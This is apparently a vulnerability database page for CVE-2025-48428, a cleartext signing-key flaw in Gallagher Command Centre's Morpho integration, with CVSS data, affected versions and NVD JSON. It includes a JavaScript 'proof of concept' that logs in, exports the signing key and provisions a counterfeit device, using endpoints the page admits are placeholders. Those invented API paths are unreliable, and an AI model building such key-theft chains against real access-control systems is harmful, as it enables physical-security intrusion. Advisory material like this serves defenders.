Security Vulnerability Report
CVE-2025-48428 CVSS 6.7 MEDIUM

Published: 2025-10-23 04:16:41
Last Modified: 2026-04-15 00:35:42

Description

Cleartext Storage of Sensitive Information (CWE-312) in the Gallagher Morpho integration could allow an authenticated user with access to the Command Centre Server to export a specific signing key while it is in use, allowing them to deploy a compromised or counterfeit device on that site. This issue affects Command Centre Server: 9.20 prior to vEL9.20.2819 (MR4), 9.10 prior to vEL9.10.3672 (MR7), 9.00 prior to vEL9.00.3831 (MR8), and all versions of 8.90 and prior.

The CVSS vector (AV:L, PR:H) reflects that the attacker must already hold a high-privilege account with local access to the server; the impact rating comes from what that access yields, since the exported signing key lets a compromised or counterfeit device be deployed on the site.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available from NVD for this entry (vulnStatus: Deferred). Affected versions per the vendor description:

Gallagher Command Centre Server 9.20 < vEL9.20.2819 (MR4)
Gallagher Command Centre Server 9.10 < vEL9.10.3672 (MR7)
Gallagher Command Centre Server 9.00 < vEL9.00.3831 (MR8)
Gallagher Command Centre Server 8.90 and all earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is a conceptual sketch: the API paths, field names and key identifier it uses are not documented in the vendor advisory and are placeholders, not a working exploit against Command Centre.
javascript
// CVE-2025-48428 PoC - proof of concept for the cleartext storage of sensitive information issue.
// Note: this PoC is for security research and authorized testing only.
// The endpoints and field names below are placeholders; the vendor advisory does not document them.
// Assumes credentials for a high-privilege user have already been obtained.
const credentials = {
  username: "admin",
  password: "password",
  server: "target-gallagher-server",
};

// Minimal JSON-over-HTTPS helper (uses the global fetch available in Node 18+).
async function sendRequest(method, path, headers = {}, body) {
  const response = await fetch(`https://${credentials.server}${path}`, {
    method,
    headers: { "Content-Type": "application/json", ...headers },
    body: body === undefined ? undefined : JSON.stringify(body),
  });
  if (!response.ok) {
    throw new Error(`${method} ${path} failed with HTTP ${response.status}`);
  }
  return response.json();
}

// 1. Authenticate to the Command Centre Server.
async function authenticate({ username, password }) {
  const session = await sendRequest("POST", "/api/auth/login", {}, { username, password });
  return session.token;
}

// 2. Reach the Morpho integration module and export the signing key.
async function exportSigningKey(sessionToken) {
  // Vulnerable point: the signing key is stored in cleartext and can be exported directly.
  const response = await sendRequest(
    "GET",
    "/api/morpho/keys/export?keyId=active-signing-key",
    { Authorization: `Bearer ${sessionToken}` },
  );
  return response.keyData; // key material returned in cleartext
}

// 3. Use the exported key to deploy a counterfeit device.
async function deployCounterfeitDevice(keyData) {
  const maliciousDevice = {
    serialNumber: "FAKE-SERIAL-001",
    signingKey: keyData, // stolen cleartext key
    type: "morpho-reader",
  };
  await sendRequest("POST", "/api/devices/provision", {}, maliciousDevice);
}

// Main flow.
(async () => {
  const token = await authenticate(credentials);
  const signingKey = await exportSigningKey(token);
  console.log("Exported signing key:", signingKey);
  await deployCounterfeitDevice(signingKey);
})().catch((err) => {
  console.error(err.message);
  process.exitCode = 1;
});

// Remediation advice: encrypted storage and access control.
// 1. Encrypt sensitive keys at rest (e.g. AES-256).
// 2. Enforce role-based access control (RBAC) on key export.
// 3. Audit all key access.
// 4. Hold keys in a hardware security module (HSM).

References

https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-48428 (vendor advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48428", "sourceIdentifier": "[email protected]", "published": "2025-10-23T04:16:40.580", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cleartext Storage of Sensitive Information (CWE-312) in the Gallagher Morpho integration could allow an authenticated user with access to the Command Centre Server to export a specific signing key while in use allowing them to deploy a compromised or counterfeit device on that site. \nThis issue affects Command Centre Server: 9.20 prior to vEL9.20.2819 (MR4), 9.10 prior to vEL9.10.3672 (MR7), 9.00 prior to vEL9.00.3831 (MR8), all versions of 8.90 and prior."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-312"}]}], "references": [{"url": "https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-48428", "source": "[email protected]"}]}}